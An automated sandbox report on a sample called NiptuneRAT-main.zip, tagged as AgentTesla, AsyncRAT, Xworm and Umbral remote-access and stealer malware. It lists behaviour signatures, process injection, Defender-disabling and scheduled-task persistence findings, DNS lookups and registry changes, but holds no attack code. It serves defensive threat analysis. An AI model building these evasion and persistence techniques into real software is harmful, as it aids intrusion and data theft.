Malware Analysis Report

2024-10-10 10:38

Sample ID 240317-1jw4hsgg43
Target NiptuneRAT-main.zip
SHA256 5b054b368eda8d148383e6a64d890b885d9a0b1898493e1008ffe1a531118b6b
Tags
identifier agilenet rat arrowrat agenttesla umbral asyncrat xworm default keylogger spyware stealer trojan ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5b054b368eda8d148383e6a64d890b885d9a0b1898493e1008ffe1a531118b6b

Threat Level: Known bad

The file NiptuneRAT-main.zip was found to be: Known bad.

Malicious Activity Summary

identifier agilenet rat arrowrat agenttesla umbral asyncrat xworm default keylogger spyware stealer trojan ransomware

Arrowrat family

Detect Umbral payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Async RAT payload

Detect Xworm Payload

Umbral family

AgentTesla

AgentTesla payload

Agenttesla family

Asyncrat family

Contains code to disable Windows Defender

AsyncRat

Xworm

Async RAT payload

AgentTesla payload

Grants admin privileges

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Obfuscated with Agile.Net obfuscator

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Delays execution with timeout.exe

Enumerates system info in registry

Modifies data under HKEY_USERS

Gathers system information

Suspicious use of SendNotifyMessage

Opens file in notepad (likely ransom note)

Suspicious use of SetWindowsHookEx

Enumerates processes with tasklist

Runs net.exe

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Gathers network information

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-17 21:41

Signatures

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Agenttesla family

agenttesla

Arrowrat family

arrowrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Asyncrat family

asyncrat

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral family

umbral

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-17 21:41

Reported

2024-03-17 21:52

Platform

win7-20240221-en

Max time kernel

359s

Max time network

364s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-17 21:41

Reported

2024-03-17 21:52

Platform

win10-20240221-en

Max time kernel

314s

Max time network

394s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.0.1.0.0.0.8.1.0.0.0.2.0.0.8.4.0.0.0.2.0.0.8.2.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-17 21:41

Reported

2024-03-17 21:52

Platform

win10v2004-20240226-en

Max time kernel

207s

Max time network

518s

Command Line

winlogon.exe

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

AsyncRat

rat asyncrat

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4936 created 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Xworm

trojan rat xworm

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\$77NiptuneClient.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4936 set thread context of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\NodeSlot = "4" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 0100000000000000ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1 = 7e003100000000007158b6ad11004465736b746f7000680009000400efbe5a58c8707158b7ad2e0000007ce101000000010000000000000000003e00000000007d0937004400650073006b0074006f007000000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370036003900000016000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 = 68003100000000007158bcad10004e495054554e7e310000500009000400efbe7158b6ad7158bdad2e00000066690100000005000000000000000000000000000000adaf97004e0069007000740075006e0065005200410054002d006d00610069006e00000018000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\MRUListEx = ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
